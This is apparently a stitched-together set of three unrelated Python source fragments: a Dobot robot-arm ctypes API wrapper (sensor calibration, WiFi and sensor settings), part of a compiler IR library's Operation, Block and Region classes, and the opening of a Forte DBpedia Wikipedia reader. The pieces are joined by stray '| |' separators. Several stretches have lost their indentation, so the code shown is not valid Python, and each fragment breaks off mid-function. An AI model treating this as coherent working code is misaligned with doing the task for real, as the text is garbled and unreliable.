    else:
        tempSlaveId = slaveId
    # Retry every 5 ms until the communication layer reports success.
    while api.GetIOADC(c_int(masterId), c_int(tempSlaveId), byref(param)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [param.value]
def SetAngleSensorStaticError(api, rearArmAngleError, frontArmAngleError):
    """Write the static angle-sensor errors of both arms; retries until delivered."""
    rear = c_float(rearArmAngleError)
    front = c_float(frontArmAngleError)
    # Retry every 5 ms until the communication layer reports success.
    while api.SetAngleSensorStaticError(c_int(masterId), c_int(slaveId), rear, front) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
def GetAngleSensorStaticError(api):
    """Return [rearArmError, frontArmError] — the static angle-sensor errors."""
    rear = c_float(0)
    front = c_float(0)
    # Retry every 5 ms until the communication layer reports success.
    while api.GetAngleSensorStaticError(c_int(masterId), c_int(slaveId), byref(rear), byref(front)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [rear.value, front.value]
def SetAngleSensorCoef(api, rearArmAngleCoef, frontArmAngleCoef):
    """Write the angle-sensor coefficients of both arms; retries until delivered."""
    rear = c_float(rearArmAngleCoef)
    front = c_float(frontArmAngleCoef)
    # Retry every 5 ms until the communication layer reports success.
    while api.SetAngleSensorCoef(c_int(masterId), c_int(slaveId), rear, front) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
def GetAngleSensorCoef(api):
    """Return [rearArmCoef, frontArmCoef] — the angle-sensor coefficients."""
    rear = c_float(0)
    front = c_float(0)
    # Retry every 5 ms until the communication layer reports success.
    while api.GetAngleSensorCoef(c_int(masterId), c_int(slaveId), byref(rear), byref(front)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [rear.value, front.value]
def SetBaseDecoderStaticError(api, baseDecoderError):
    """Write the base decoder's static error; retries until delivered."""
    err = c_float(baseDecoderError)
    # Retry every 5 ms until the communication layer reports success.
    while api.SetBaseDecoderStaticError(c_int(masterId), c_int(slaveId), err) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
def GetBaseDecoderStaticError(api):
    """Return [error] — the base decoder's static error."""
    err = c_float(0)
    # Retry every 5 ms until the communication layer reports success.
    while api.GetBaseDecoderStaticError(c_int(masterId), c_int(slaveId), byref(err)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [err.value]
def GetWIFIConnectStatus(api):
    """Return [bool] — whether the device's WIFI is currently connected."""
    isConnected = c_bool(0)
    # NOTE(review): despite its name, a falsy QuitDobotApiFlag aborts the loop,
    # so the flag appears to mean "API still running" — confirm at its setter.
    while QuitDobotApiFlag:
        if api.GetWIFIConnectStatus(c_int(masterId), c_int(slaveId), byref(isConnected)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [isConnected.value]
def SetWIFIConfigMode(api, enable):
    """Enable/disable WIFI config mode; stops retrying once the API quit flag clears."""
    while QuitDobotApiFlag:
        if api.SetWIFIConfigMode(c_int(masterId), c_int(slaveId), enable) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
def GetWIFIConfigMode(api):
    """Read whether WIFI config mode is enabled; stops retrying once the API quit flag clears."""
    isEnabled = c_bool(0)
    while QuitDobotApiFlag:
        if api.GetWIFIConfigMode(c_int(masterId), c_int(slaveId), byref(isEnabled)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [isEnabled.value]
def SetWIFISSID(api, ssid):
    """Write the WIFI SSID; stops retrying once the API quit flag clears.

    Fix: the buffer was sized by character count (len(ssid)) and then filled
    with the UTF-8 encoding, which raises ValueError for any multi-byte
    (non-ASCII) SSID and leaves no room for a NUL terminator. Building the
    buffer from the encoded bytes allocates len(bytes)+1 and NUL-terminates.
    """
    szPara = create_string_buffer(ssid.encode("utf-8"))
    while True:
        if not QuitDobotApiFlag:
            break
        result = api.SetWIFISSID(c_int(masterId), c_int(slaveId), szPara)
        if result != DobotCommunicate.DobotCommunicate_NoError:
            dSleep(5)
            continue
        break
def GetWIFISSID(api):
    """Read the WIFI SSID; stops retrying once the API quit flag clears."""
    szPara = create_string_buffer(100)
    # NOTE(review): buffer is 100 bytes but 25 is reported as its size to the
    # API -- presumably the firmware caps SSID length at 25; confirm.
    while QuitDobotApiFlag:
        if api.GetWIFISSID(c_int(masterId), c_int(slaveId), szPara, 25) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [szPara.value.decode("utf-8")]
def SetWIFIPassword(api, password):
    """Write the WIFI password; stops retrying once the API quit flag clears.

    Fix: the previous fixed 25-byte buffer raised ValueError for passwords
    whose UTF-8 encoding exceeds 25 bytes, and a password of exactly 25 bytes
    left no NUL terminator. Building the buffer from the encoded bytes
    allocates len(bytes)+1 and always NUL-terminates.
    """
    szPara = create_string_buffer(password.encode("utf-8"))
    while True:
        if not QuitDobotApiFlag:
            break
        result = api.SetWIFIPassword(c_int(masterId), c_int(slaveId), szPara)
        if result != DobotCommunicate.DobotCommunicate_NoError:
            dSleep(5)
            continue
        break
def GetWIFIPassword(api):
    """Read the WIFI password; stops retrying once the API quit flag clears."""
    szPara = create_string_buffer(25)
    while QuitDobotApiFlag:
        if api.GetWIFIPassword(c_int(masterId), c_int(slaveId), szPara, 25) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [szPara.value.decode("utf-8")]
def SetWIFIIPAddress(api, dhcp, addr1, addr2, addr3, addr4):
    """Write the WIFI IP configuration; stops retrying once the API quit flag clears."""
    cfg = WIFIIPAddress()
    cfg.dhcp = dhcp
    cfg.addr1, cfg.addr2, cfg.addr3, cfg.addr4 = addr1, addr2, addr3, addr4
    while QuitDobotApiFlag:
        if api.SetWIFIIPAddress(c_int(masterId), c_int(slaveId), byref(cfg)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
def GetWIFIIPAddress(api):
    """Read the WIFI IP configuration; stops retrying once the API quit flag clears."""
    cfg = WIFIIPAddress()
    while QuitDobotApiFlag:
        if api.GetWIFIIPAddress(c_int(masterId), c_int(slaveId), byref(cfg)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    # Normalize each struct field through c_uint8, as the original code did.
    return [c_uint8(v).value for v in (cfg.dhcp, cfg.addr1, cfg.addr2, cfg.addr3, cfg.addr4)]
def SetWIFINetmask(api, addr1, addr2, addr3, addr4):
    """Write the WIFI netmask; stops retrying once the API quit flag clears."""
    mask = WIFINetmask()
    mask.addr1, mask.addr2, mask.addr3, mask.addr4 = addr1, addr2, addr3, addr4
    while QuitDobotApiFlag:
        if api.SetWIFINetmask(c_int(masterId), c_int(slaveId), byref(mask)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
def GetWIFINetmask(api):
    """Read the WIFI netmask; stops retrying once the API quit flag clears."""
    mask = WIFINetmask()
    while QuitDobotApiFlag:
        if api.GetWIFINetmask(c_int(masterId), c_int(slaveId), byref(mask)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [c_uint8(v).value for v in (mask.addr1, mask.addr2, mask.addr3, mask.addr4)]
def SetWIFIGateway(api, addr1, addr2, addr3, addr4):
    """Write the WIFI gateway address; stops retrying once the API quit flag clears."""
    gw = WIFIGateway()
    gw.addr1, gw.addr2, gw.addr3, gw.addr4 = addr1, addr2, addr3, addr4
    while QuitDobotApiFlag:
        if api.SetWIFIGateway(c_int(masterId), c_int(slaveId), byref(gw)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
def GetWIFIGateway(api):
    """Read the WIFI gateway address; stops retrying once the API quit flag clears."""
    gw = WIFIGateway()
    while QuitDobotApiFlag:
        if api.GetWIFIGateway(c_int(masterId), c_int(slaveId), byref(gw)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [c_uint8(v).value for v in (gw.addr1, gw.addr2, gw.addr3, gw.addr4)]
def SetWIFIDNS(api, addr1, addr2, addr3, addr4):
    """Write the WIFI DNS address; stops retrying once the API quit flag clears."""
    dns = WIFIDNS()
    dns.addr1, dns.addr2, dns.addr3, dns.addr4 = addr1, addr2, addr3, addr4
    while QuitDobotApiFlag:
        if api.SetWIFIDNS(c_int(masterId), c_int(slaveId), byref(dns)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
def GetWIFIDNS(api):
    """Read the WIFI DNS address; stops retrying once the API quit flag clears."""
    dns = WIFIDNS()
    while QuitDobotApiFlag:
        if api.GetWIFIDNS(c_int(masterId), c_int(slaveId), byref(dns)) == DobotCommunicate.DobotCommunicate_NoError:
            break
        dSleep(5)
    return [c_uint8(v).value for v in (dns.addr1, dns.addr2, dns.addr3, dns.addr4)]
def SetColorSensor(api, isEnable, colorPort, version=0):
    """Enable/disable the color sensor (queued command), retrying until the call succeeds."""
    enable = c_bool(isEnable)
    port = c_uint8(colorPort)
    ver = c_uint8(version)
    queuedCmdIndex = c_uint64(0)
    # A controller driving a MagicianLite (or an idle port) addresses the
    # sensor with slave id -1; every other combination keeps slaveId.
    if masterDevType == DevType.Conntroller and slaveDevType in (DevType.MagicianLite, DevType.Idle):
        tempSlaveId = -1
    else:
        tempSlaveId = slaveId
    while api.SetColorSensor(c_int(masterId), c_int(tempSlaveId), enable, port, ver, 1, byref(queuedCmdIndex)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
def GetColorSensor(api):
    """Read the color sensor RGB values, retrying until the call succeeds."""
    r = c_ubyte(0)
    g = c_ubyte(0)
    b = c_ubyte(0)
    if masterDevType == DevType.Conntroller and slaveDevType in (DevType.MagicianLite, DevType.Idle):
        tempSlaveId = -1
    else:
        tempSlaveId = slaveId
    while api.GetColorSensor(c_int(masterId), c_int(tempSlaveId), byref(r), byref(g), byref(b)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [r.value, g.value, b.value]
def SetInfraredSensor(api, isEnable, infraredPort, version=0):
    """Enable/disable the infrared sensor (queued command), retrying until the call succeeds."""
    enable = c_bool(isEnable)
    port = c_uint8(infraredPort)
    ver = c_uint8(version)
    queuedCmdIndex = c_uint64(0)
    if masterDevType == DevType.Conntroller and slaveDevType in (DevType.MagicianLite, DevType.Idle):
        tempSlaveId = -1
    else:
        tempSlaveId = slaveId
    while api.SetInfraredSensor(c_int(masterId), c_int(tempSlaveId), enable, port, ver, 1, byref(queuedCmdIndex)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
def GetInfraredSensor(api, infraredPort):
    """Read the infrared sensor on the given port, retrying until the call succeeds."""
    port = c_uint8(infraredPort)
    value = c_ubyte(0)
    if masterDevType == DevType.Conntroller and slaveDevType in (DevType.MagicianLite, DevType.Idle):
        tempSlaveId = -1
    else:
        tempSlaveId = slaveId
    while api.GetInfraredSensor(c_int(masterId), c_int(tempSlaveId), port, byref(value)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [value.value]
def SetLostStepParams(api, threshold, isQueued=0):
    """Set the lost-step detection threshold; returns the queued command index."""
    queuedCmdIndex = c_uint64(0)
    thresh = c_float(threshold)
    while api.SetLostStepParams(c_int(masterId), c_int(slaveId), thresh, isQueued, byref(queuedCmdIndex)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [queuedCmdIndex.value]
def SetLostStepCmd(api, isQueued=0):
    """Trigger lost-step detection; returns the queued command index."""
    queuedCmdIndex = c_uint64(0)
    while api.SetLostStepCmd(c_int(masterId), c_int(slaveId), isQueued, byref(queuedCmdIndex)) != DobotCommunicate.DobotCommunicate_NoError:
        dSleep(5)
    return [queuedCmdIndex.value]
def GetUART4PeripheralsType(api):
    """Read the peripheral type attached to UART4.

    Returns:
        [type_value]; [0] when the master/slave device combination is not one
        that exposes UART4 peripherals (no query is issued in that case,
        matching the original behavior).

    Fixes: the local variable shadowed the builtin `type`, and the two retry
    loops were duplicated; they are unified here with a single target slave id.
    """
    periType = c_uint8(0)
    if masterDevType == DevType.Conntroller and slaveDevType in (DevType.MagicianLite, DevType.Idle):
        targetSlaveId = -1
    elif masterDevType == DevType.Magician:
        targetSlaveId = slaveId
    else:
        targetSlaveId = None  # unsupported combination: skip the query
    if targetSlaveId is not None:
        while True:
            result = api.GetUART4PeripheralsType(c_int(masterId), c_int(targetSlaveId), byref(periType))
            if result != DobotCommunicate.DobotCommunicate_NoError:
                dSleep(5)
                continue
            break
    return [periType.value]
def GetDeviceVersionEx(api):  # 2019.6.25 song: with MagicBox + Magician Lite, also fetch the box's version
    """Read firmware/hardware versions for the MagicBox + MagicianLite pair.

    Returns [box_versions, lite_versions], each being
    [fw_major, fw_minor, fw_revision, fw_alpha, hw_major, hw_minor,
    hw_revision, hw_alpha].

    NOTE(review): for any other master/slave combination this function falls
    through and implicitly returns None -- confirm callers expect that.
    """
    deviceVersion1 = DeviceVersion()
    deviceVersion2 = DeviceVersion()
    if masterDevType == DevType.Conntroller and slaveDevType == DevType.MagicianLite:
        # 2019.09.03 by song: controller + MagicianLite returns both devices' version info
        # Slave id -1 queries the controller (MagicBox) itself.
        while(True):
            result = api.GetDeviceVersion(c_int(masterId), c_int(-1), byref(deviceVersion1))
            if result != DobotCommunicate.DobotCommunicate_NoError:
                dSleep(5)
                continue
            break
        list_MagicBoxVersion = [deviceVersion1.fw_majorVersion, deviceVersion1.fw_minorVersion, deviceVersion1.fw_revision, deviceVersion1.fw_alphaVersion,
                                deviceVersion1.hw_majorVersion, deviceVersion1.hw_minorVersion, deviceVersion1.hw_revision, deviceVersion1.hw_alphaVersion]
        while(True):
            result = api.GetDeviceVersion(c_int(masterId), c_int(slaveId), byref(deviceVersion2))
            if result != DobotCommunicate.DobotCommunicate_NoError:
                dSleep(5)
                continue
            break
        list_MagicianLiteVersion = [deviceVersion2.fw_majorVersion, deviceVersion2.fw_minorVersion, deviceVersion2.fw_revision, deviceVersion2.fw_alphaVersion,
                                    deviceVersion2.hw_majorVersion, deviceVersion2.hw_minorVersion, deviceVersion2.hw_revision, deviceVersion2.hw_alphaVersion]
        return [list_MagicBoxVersion, list_MagicianLiteVersion]
################## Ex extended functions: each one waits for its command to finish executing ##################
def GetPoseEx(api, index):
    """Return one pose component rounded to 4 decimals; index 0 is the linear rail position."""
    if index == 0:
        if not GetDeviceWithL(api):
            print("Dobot is not in L model")
            return
        return round(GetPoseL(api)[0], 4)
    # Indices 1..n map to GetPose()'s components 0..n-1.
    return round(GetPose(api)[index - 1], 4)
def SetHOMECmdEx(api, temp, isQueued=0):
    """Issue a HOME command and block until all queued sub-commands have run.

    `ret` holds the queued indices returned by SetHOMECmd: ret[0] is polled on
    the slave device, ret[1] on the controller (slave id -1) where applicable.
    Polls every 100 ms until the device's current queue index catches up.
    """
    ret = SetHOMECmd(api, temp, isQueued)
    queuedCmdIndex = c_uint64(0)
    queuedCmdIndex1 = c_uint64(0)
    if masterDevType == DevType.Conntroller and slaveDevType == DevType.MagicianLite:
        if isUsingLinearRail:
            # Wait on the controller (linear rail) queue first...
            while(True):
                result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(-1), byref(queuedCmdIndex1))
                if result == DobotCommunicate.DobotCommunicate_NoError and ret[1] <= queuedCmdIndex1.value:
                    break
                dSleep(100)
            # ...then on the MagicianLite's own queue.
            while(True):
                result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(slaveId), byref(queuedCmdIndex))
                if result == DobotCommunicate.DobotCommunicate_NoError and ret[0] <= queuedCmdIndex.value:
                    break
                dSleep(100)
        else:
            while(True):
                result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(slaveId), byref(queuedCmdIndex))
                if result == DobotCommunicate.DobotCommunicate_NoError and ret[0] <= queuedCmdIndex.value:
                    break
                dSleep(100)
    elif masterDevType == DevType.Conntroller and slaveDevType == DevType.Idle:
        # Idle slave port: only the controller queue is relevant.
        while(True):
            result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(-1), byref(queuedCmdIndex1))
            if result == DobotCommunicate.DobotCommunicate_NoError and ret[1] <= queuedCmdIndex1.value:
                break
            dSleep(100)
    else:
        while(True):
            result = api.GetQueuedCmdCurrentIndex(c_int(masterId), c_int(slaveId), byref(queuedCmdIndex))
            if result == DobotCommunicate.DobotCommunicate_NoError and ret[0] <= queuedCmdIndex.value:
                break
            dSleep(100)
def SetWAITCmdEx(api, waitTime, isQueued=0):
ret = SetWAITCmd(api, waitTime, isQueued)
while(True):
if not QuitDobotApiFlag:
break
if ret[0] <= GetQueuedCmdCurrentIndex(api)[0]:
| |
instead."""
if value_mapper is None:
value_mapper = {}
if block_mapper is None:
block_mapper = {}
operands = [
(value_mapper[operand] if operand in value_mapper else operand)
for operand in self.operands
]
result_types = [res.typ for res in self.results]
attributes = self.attributes.copy()
successors = [(block_mapper[successor]
if successor in block_mapper else successor)
for successor in self.successors]
regions = [Region() for _ in self.regions]
cloned_op = self.create(operands=operands,
result_types=result_types,
attributes=attributes,
successors=successors,
regions=regions)
for idx, result in enumerate(cloned_op.results):
value_mapper[self.results[idx]] = result
return cloned_op
def clone(self: OpT,
value_mapper: Optional[Dict[SSAValue, SSAValue]] = None,
block_mapper: Optional[Dict[Block, Block]] = None) -> OpT:
"""Clone an operation with all its regions and operations in them."""
if value_mapper is None:
value_mapper = {}
if block_mapper is None:
block_mapper = {}
op = self.clone_without_regions(value_mapper, block_mapper)
for idx, region in enumerate(self.regions):
region.clone_into(op.regions[idx], 0, value_mapper, block_mapper)
return op
def erase(self,
safe_erase: bool = True,
drop_references: bool = True) -> None:
"""
Erase the operation, and remove all its references to other operations.
If safe_erase is specified, check that the operation results are not used.
"""
assert self.parent is None, "Operation with parents should first be detached before erasure."
if drop_references:
self.drop_all_references()
for result in self.results:
result.erase(safe_erase=safe_erase)
def detach(self):
"""Detach the operation from its parent block."""
if self.parent is None:
raise Exception("Cannot detach a toplevel operation.")
self.parent.detach_op(self)
def get_toplevel_object(self) -> Union[Operation, Block, Region]:
"""Get the operation, block, or region ancestor that has no parents."""
if self.parent is None:
return self
return self.parent.get_toplevel_object()
def is_ancestor(self, op: Union[Operation, Block, Region]) -> bool:
"""Returns true if the operation is an ancestor of the operation, block, or region."""
if op is self:
return True
if op.parent is None:
return False
return self.is_ancestor(op.parent)
    def __eq__(self, other: Operation) -> bool:
        # Operations compare by identity; structural equality is not defined.
        return self is other
    def __hash__(self) -> int:
        # Hash by identity, consistent with the identity-based __eq__ above.
        return id(self)
@dataclass(eq=False)
class Block:
    """A sequence of operations"""
    _args: FrozenList[BlockArgument] = field(default_factory=FrozenList,
                                             init=False)
    """The basic block arguments."""
    ops: List[Operation] = field(default_factory=list, init=False)
    """Ordered operations contained in the block."""
    parent: Optional[Region] = field(default=None, init=False, repr=False)
    """Parent region containing the block."""
    def parent_op(self) -> Optional[Operation]:
        # Block -> Region -> Operation: the op owning the region that holds this block.
        return self.parent.parent if self.parent else None
    def parent_region(self) -> Optional[Region]:
        return self.parent
    def parent_block(self) -> Optional[Block]:
        # Three hops up: the block enclosing the operation that owns our region.
        return self.parent.parent.parent if self.parent and self.parent.parent else None
    def __repr__(self) -> str:
        return f"Block(_args={repr(self._args)}, num_ops={len(self.ops)})"
    @property
    def args(self) -> FrozenList[BlockArgument]:
        """Returns the block arguments."""
        return self._args
    @staticmethod
    def from_arg_types(arg_types: List[Attribute]) -> Block:
        # Build an empty block whose arguments have the given types.
        b = Block()
        b._args = FrozenList([
            BlockArgument(typ, b, index) for index, typ in enumerate(arg_types)
        ])
        b._args.freeze()
        return b
    @staticmethod
    def from_ops(ops: List[Operation],
                 arg_types: Optional[List[Attribute]] = None):
        # Build a block containing `ops`, optionally with typed arguments.
        b = Block()
        if arg_types is not None:
            b._args = FrozenList([
                BlockArgument(typ, b, index)
                for index, typ in enumerate(arg_types)
            ])
            b._args.freeze()
        b.add_ops(ops)
        return b
    class BlockCallback(Protocol):
        # Structural type for callables that build a block body from its arguments.
        def __call__(self, *args: BlockArgument) -> List[Operation]:
            ...
    @staticmethod
    def from_callable(block_arg_types: List[Attribute], f: BlockCallback):
        # Materialize the arguments, then let `f` produce the operations.
        b = Block.from_arg_types(block_arg_types)
        b.add_ops(f(*b.args))
        return b
    def is_ancestor(self, op: Union[Operation, Block, Region]) -> bool:
        """Returns true if the block is an ancestor of the operation, block, or region."""
        if op is self:
            return True
        if op.parent is None:
            return False
        return self.is_ancestor(op.parent)
    def insert_arg(self, typ: Attribute, index: int) -> BlockArgument:
        """
        Insert a new argument with a given type to the arguments list at a specific index.
        Returns the new argument.
        """
        if index < 0 or index > len(self._args):
            raise Exception("Unexpected index")
        new_arg = BlockArgument(typ, self, index)
        # Shift the stored index of every argument after the insertion point.
        for arg in self._args[index:]:
            arg.index += 1
        self._args = FrozenList(
            list(self._args[:index]) + [new_arg] + list(self._args[index:]))
        self._args.freeze()
        return new_arg
    def erase_arg(self, arg: BlockArgument, safe_erase: bool = True) -> None:
        """
        Erase a block argument.
        If safe_erase is True, check that the block argument is not used.
        If safe_erase is False, replace the block argument uses with an ErasedSSAVAlue.
        """
        if arg.block is not self:
            raise Exception(
                "Attempting to delete an argument of the wrong block")
        # Re-index the arguments that followed the erased one.
        for block_arg in self._args[arg.index + 1:]:
            block_arg.index -= 1
        self._args = FrozenList(
            list(self._args[:arg.index]) + list(self._args[arg.index + 1:]))
        arg.erase(safe_erase=safe_erase)
    def _attach_op(self, operation: Operation) -> None:
        """Attach an operation to the block, and check that it has no parents."""
        if operation.parent is not None:
            raise ValueError(
                "Can't add to a block an operation already attached to a block."
            )
        if operation.is_ancestor(self):
            # Would create a containment cycle: the op transitively contains this block.
            raise ValueError(
                "Can't add an operation to a block contained in the operation."
            )
        operation.parent = self
    def add_op(self, operation: Operation) -> None:
        """
        Add an operation at the end of the block.
        The operation should not be attached to another block already.
        """
        self._attach_op(operation)
        self.ops.append(operation)
    def add_ops(self, ops: List[Operation]) -> None:
        """
        Add operations at the end of the block.
        The operations should not be attached to another block.
        """
        for op in ops:
            self.add_op(op)
    def insert_op(self,
                  ops: Union[Operation, List[Operation]],
                  index: int,
                  name: Optional[str] = None) -> None:
        """
        Insert one or multiple operations at a given index in the block.
        The operations should not be attached to another block.
        If `name` is given, it is assigned to every result of the inserted ops.
        """
        if index < 0 or index > len(self.ops):
            raise ValueError(
                f"Can't insert operation in index {index} in a block with {len(self.ops)} operations."
            )
        if not isinstance(ops, list):
            ops = [ops]
        if name:
            for curr_op in ops:
                for res in curr_op.results:
                    res.name = name
        for op in ops:
            self._attach_op(op)
        self.ops = self.ops[:index] + ops + self.ops[index:]
    def get_operation_index(self, op: Operation) -> int:
        """Get the operation position in a block."""
        if op.parent is not self:
            raise Exception("Operation is not a children of the block.")
        # Linear scan by identity; blocks are expected to be modest in size.
        for idx, block_op in enumerate(self.ops):
            if block_op is op:
                return idx
        assert False, "Unexpected xdsl error"
    def detach_op(self, op: Union[int, Operation]) -> Operation:
        """
        Detach an operation from the block.
        Returns the detached operation.
        """
        if isinstance(op, Operation):
            op_idx = self.get_operation_index(op)
        else:
            op_idx = op
            op = self.ops[op_idx]
        if op.parent is not self:
            raise Exception("Cannot detach operation from a different block.")
        op.parent = None
        self.ops = self.ops[:op_idx] + self.ops[op_idx + 1:]
        return op
    def erase_op(self,
                 op: Union[int, Operation],
                 safe_erase: bool = True) -> None:
        """
        Erase an operation from the block.
        If safe_erase is True, check that the operation has no uses.
        """
        op = self.detach_op(op)
        op.erase(safe_erase=safe_erase)
    def walk(self, fun: Callable[[Operation], None]) -> None:
        """Call a function on all operations contained in the block."""
        for op in self.ops:
            op.walk(fun)
    def verify(self) -> None:
        for operation in self.ops:
            if operation.parent != self:
                # NOTE(review): the message says "region" but this is a block
                # -- consider rewording.
                raise Exception(
                    "Parent pointer of operation does not refer to containing region"
                )
            operation.verify()
    def drop_all_references(self) -> None:
        """
        Drop all references to other operations.
        This function is called prior to deleting a block.
        """
        self.parent = None
        for op in self.ops:
            op.drop_all_references()
    def erase(self, safe_erase: bool = True) -> None:
        """
        Erase the block, and remove all its references to other operations.
        If safe_erase is specified, check that no operation results are used outside the block.
        """
        assert self.parent is None, "Blocks with parents should first be detached before erasure."
        self.drop_all_references()
        for op in self.ops:
            # References were already dropped above; skip the per-op drop.
            op.erase(safe_erase=safe_erase, drop_references=False)
    def get_toplevel_object(self) -> Union[Operation, Block, Region]:
        """Get the operation, block, or region ancestor that has no parents."""
        if self.parent is None:
            return self
        return self.parent.get_toplevel_object()
    def __eq__(self, other: Block) -> bool:
        # Identity-based equality (dataclass-generated eq is disabled above).
        return self is other
    def __hash__(self) -> int:
        return id(self)
@dataclass
class Region:
"""A region contains a CFG of blocks. Regions are contained in operations."""
blocks: List[Block] = field(default_factory=list, init=False)
"""Blocks contained in the region. The first block is the entry block."""
parent: Optional[Operation] = field(default=None, init=False, repr=False)
"""Operation containing the region."""
    def parent_block(self) -> Optional[Block]:
        # Region -> Operation -> Block: the block holding the op that owns this region.
        return self.parent.parent if self.parent else None
    def parent_op(self) -> Optional[Operation]:
        # The operation that directly owns this region, if attached.
        return self.parent
    def parent_region(self) -> Optional[Region]:
        # Three hops up: the region containing the op that owns this region.
        return self.parent.parent.parent if self.parent and self.parent.parent else None
    def __repr__(self) -> str:
        # Keep the repr cheap: report only the number of blocks.
        return f"Region(num_blocks={len(self.blocks)})"
@staticmethod
def from_operation_list(ops: List[Operation]) -> Region:
block = Block.from_ops(ops)
region = Region()
region.add_block(block)
return region
@staticmethod
def from_block_list(blocks: List[Block]) -> Region:
region = Region()
for block in blocks:
region.add_block(block)
return region
@staticmethod
def get(arg: Region | List[Block] | List[Operation]) -> Region:
if isinstance(arg, Region):
return arg
if isinstance(arg, list):
if len(arg) == 0:
return Region.from_operation_list([])
if isinstance(arg[0], Block):
return Region.from_block_list(cast(List[Block], arg))
if isinstance(arg[0], Operation):
return Region.from_operation_list(cast(List[Operation], arg))
raise TypeError(f"Can't build a | |
# Source file: forte/datasets/wikipedia/dbpedia/dbpedia_datasets.py (repo: J007X/forte)
# Copyright 2019 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
In this module, we provide a few readers to help reading DBpedia processed
Wikipedia dumps. To use the readers here, the DBpedia full text datasets
are needed: https://wiki.dbpedia.org/downloads-2016-10#p10608-2
"""
import csv
import logging
import os
from collections import defaultdict
from typing import (
Iterator,
Dict,
List,
Tuple,
TextIO,
Any,
DefaultDict,
Optional,
)
import rdflib
from smart_open import open
from forte.common import Resources
from forte.common.configuration import Config
from forte.common.exception import ResourceError
from forte.data.base_reader import PackReader
from forte.data.data_pack import DataPack
from forte.datasets.wikipedia.dbpedia.db_utils import (
NIFParser,
get_resource_attribute,
get_resource_name,
get_resource_fragment,
print_progress,
ContextGroupedNIFReader,
state_type,
)
from forte.processors.base import PackWriter
from ft.onto.wikipedia import (
WikiPage,
WikiSection,
WikiParagraph,
WikiTitle,
WikiAnchor,
WikiInfoBoxProperty,
WikiInfoBoxMapped,
WikiCategory,
)
__all__ = [
"DBpediaWikiReader",
"WikiPackReader",
"WikiArticleWriter",
"WikiAnchorReader",
"WikiStructReader",
"WikiPropertyReader",
"WikiInfoBoxReader",
]
class DBpediaWikiReader(PackReader):
    """
    This reader reads in the Wikipedia full text articles from a DBpedia
    full text dump, which is the `NIF Context` dataset from here:
    https://wiki.dbpedia.org/downloads-2016-10#p10608-2 .
    """
    def __init__(
        self,
    ):
        super().__init__()
        # Maps a redirect page name to its canonical target page name.
        self.__redirects: Dict[str, str] = {}
    def initialize(self, resources: Resources, configs: Config):
        """Load the mandatory redirect table from the shared resources."""
        super().initialize(resources, configs)
        if self.resources.contains("redirects"):
            self.__redirects = self.resources.get("redirects")
            logging.info("%d redirects loaded.", len(self.__redirects))
        else:
            raise ResourceError("Redirects not provided from resources.")
    def _collect(  # type: ignore
        self, nif_context: str
    ) -> Iterator[Dict[str, str]]:
        # NOTE(review): `str_data` is created once and mutated/yielded across
        # iterations, and the yield fires for every statement whose subject
        # and context carry a name/oldid -- consumers must use the dict before
        # the next yield, and the same context may be yielded repeatedly.
        # Confirm this matches the NIF dataset layout before refactoring.
        str_data: Dict[str, str] = {}
        for context_statements in NIFParser(nif_context):
            for s, v, o, c in context_statements:
                nif_type = get_resource_attribute(s, "nif")
                print_progress(f"Collecting DBpedia resource: [{c.identifier}]")
                fragment = get_resource_fragment(v)
                if (
                    nif_type
                    and nif_type == "context"
                    and fragment is not None
                    and fragment == "isString"
                ):
                    # The `isString` triple carries the article's full text.
                    str_data["text"] = o.toPython()
                doc_name: Optional[str] = get_resource_name(s)
                old_id: Optional[str] = get_resource_attribute(
                    c.identifier, "oldid"
                )
                if doc_name is not None and old_id is not None:
                    str_data["doc_name"] = doc_name
                    str_data["oldid"] = old_id
                    yield str_data
    def _parse_pack(self, doc_data: Dict[str, str]) -> Iterator[DataPack]:
        """Build one DataPack holding the article text and its WikiPage span."""
        pack = DataPack()
        doc_name: str = doc_data["doc_name"]
        # Resolve redirects so the pack is named after the canonical page.
        if doc_name in self.__redirects:
            doc_name = self.__redirects[doc_name]
        full_text: str = doc_data["text"]
        pack.set_text(full_text)
        # The WikiPage annotation spans the entire article text.
        page = WikiPage(pack, 0, len(full_text))
        page.page_id = doc_data["oldid"]
        page.page_name = doc_name
        pack.pack_name = doc_name
        yield pack
def read_index(pack_index_path: str) -> Dict[str, str]:
    """
